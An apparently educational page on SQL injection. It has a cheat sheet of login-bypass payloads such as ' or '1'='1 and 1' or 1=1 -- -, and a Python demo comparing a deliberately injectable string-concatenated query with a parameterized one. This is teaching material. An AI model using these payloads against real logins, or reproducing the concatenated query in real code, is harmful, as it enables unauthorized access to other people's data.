SQL INJECTION

SQL Injection (SQLi) is an injection attack in which an attacker executes malicious SQL statements to control a web application’s database server, thereby accessing, modifying and deleting data without authorization.

What can SQL Injection do?

  • Bypass a web application’s authorization mechanisms and extract sensitive information
  • Easily control application behavior that’s based on data in the database
  • Inject further malicious code to be executed when users access the application
  • Add, modify and delete data, corrupting the database and making the application unusable
  • Enumerate the authentication details of a user registered on a website and use the data in attacks on other sites

Cheat sheet

| User name | Password | SQL Query |
|---|---|---|
| tom | tom | SELECT * FROM users WHERE name='tom' and password='tom' |
| tom | ' or '1'='1 | SELECT * FROM users WHERE name='tom' and password='' or '1'='1' |
| tom | ' or 1='1 | SELECT * FROM users WHERE name='tom' and password='' or 1='1' |
| tom | 1' or 1=1 -- - | SELECT * FROM users WHERE name='tom' and password='' or 1=1-- -' |
| ' or '1'='1 | ' or '1'='1 | SELECT * FROM users WHERE name='' or '1'='1' and password='' or '1'='1' |
| ' or ' 1=1 | ' or ' 1=1 | SELECT * FROM users WHERE name='' or ' 1=1' and password='' or ' 1=1' |
| 1' or 1=1 -- - | blah | SELECT * FROM users WHERE name='1' or 1=1 -- -' and password='blah' |
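
The cheat sheet rows above work only when the login query is built by string concatenation. The following added example (not code from the original page) runs several of those rows against a concatenated query and against a parameterized one; the in-memory SQLite database, the sample users and the function names are assumptions made for the demonstration.

```python
import sqlite3

def make_db():
    # Constructed sample data: a `users` table shaped like the cheat sheet's query.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("tom", "tom"), ("alice", "constructed-pw")])
    return conn

def login_concat(conn, name, password):
    """Vulnerable form: input is spliced into the SQL text, so quotes in the
    input change the structure of the WHERE clause. Returns matched row count."""
    sql = ("SELECT * FROM users WHERE name='" + name +
           "' and password='" + password + "'")
    return len(conn.execute(sql).fetchall())

def login_param(conn, name, password):
    """Hardened form: placeholders bind input as data, so quotes, OR clauses
    and comment markers are compared literally. Returns matched row count."""
    sql = "SELECT * FROM users WHERE name=? and password=?"
    return len(conn.execute(sql, (name, password)).fetchall())

# (user name, password) pairs taken from the cheat sheet rows above.
CHEAT_SHEET = [
    ("tom", "tom"),                      # legitimate login
    ("tom", "' or '1'='1"),
    ("tom", "1' or 1=1 -- -"),
    ("' or '1'='1", "' or '1'='1"),
    ("1' or 1=1 -- -", "blah"),
]

def compare(conn=None):
    """Return (name, password, rows_concatenated, rows_parameterized) per pair."""
    if conn is None:
        conn = make_db()
    return [(n, p, login_concat(conn, n, p), login_param(conn, n, p))
            for n, p in CHEAT_SHEET]

if __name__ == "__main__":
    for name, pw, concat_rows, param_rows in compare():
        print(f"{name!r:20} {pw!r:20} concatenated={concat_rows} "
              f"parameterized={param_rows}")
```

The rows built on 1='1' and ' 1=1' are left out because their result depends on how the database engine coerces types, so they do not behave the same on every engine.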